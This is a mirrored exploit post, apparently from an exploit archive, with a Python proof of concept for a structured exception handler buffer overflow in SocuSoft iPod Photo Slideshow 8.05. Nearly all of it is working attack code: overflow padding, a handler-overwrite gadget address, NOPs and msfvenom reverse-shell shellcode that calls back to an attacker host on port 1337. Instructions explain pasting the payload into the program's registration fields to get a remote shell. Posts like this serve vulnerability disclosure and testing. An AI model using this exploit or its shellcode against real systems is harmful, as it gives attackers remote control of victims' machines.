SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)
|
来源:@Pwsecspirit 作者:Singh 发布时间:2018-09-11
|
|
# Exploit Title: SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH) # Date: 2018-09-08 # Author: Shubham Singh # Known As: Spirited Wolf [Twitter: @Pwsecspirit] # Software Link:http://www.dvd-photo-slideshow.com/ipod-photo-slideshow.html # Tested Version: 8.05 # Tested on OS: Windows XP Service Pack 3 x86 # Reported but got no reply back # Steps to Reproduce: # 1. Run the python exploit script, it will create a new file with the name "exploit.txt". # 2. Just copy the text inside "exploit.txt". # 3. Start the program. In the new window click "Help" > "Register ... # 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". # Click "Apply" > "Ok" # You will see a sweet reverse shell poped up in your attacker box. buffer = "A" * (548-36) #0x1004793e : pop edi # pop esi # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 #(C:\Program Files\Socusoft\Socusoft iPod Photo Slideshow\DVDPhotoData.dll) nseh = "\xeb\x06\x90\x90" seh = "\x3e\x79\x04\x10" nops = "\x90" * 18 # Badchar \x00\x0a\x0d # sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 # -b '\x00\x0a\x0d' -f python buf = "" buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33" buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03" buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8" buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e" buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e" buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86" buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf" buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e" buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c" buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c" buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2" buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda" buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2" buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92" buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4" buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f" buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09" buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02" buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc" buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0" buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d" buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64" buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf" buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79" buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2" buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9" buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7" pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf)) exploit = buffer + nseh + seh + nops + buf + pad try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(exploit) f.write(exploit) f.close() print "[+] File created!" except: print "File cannot be created"
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|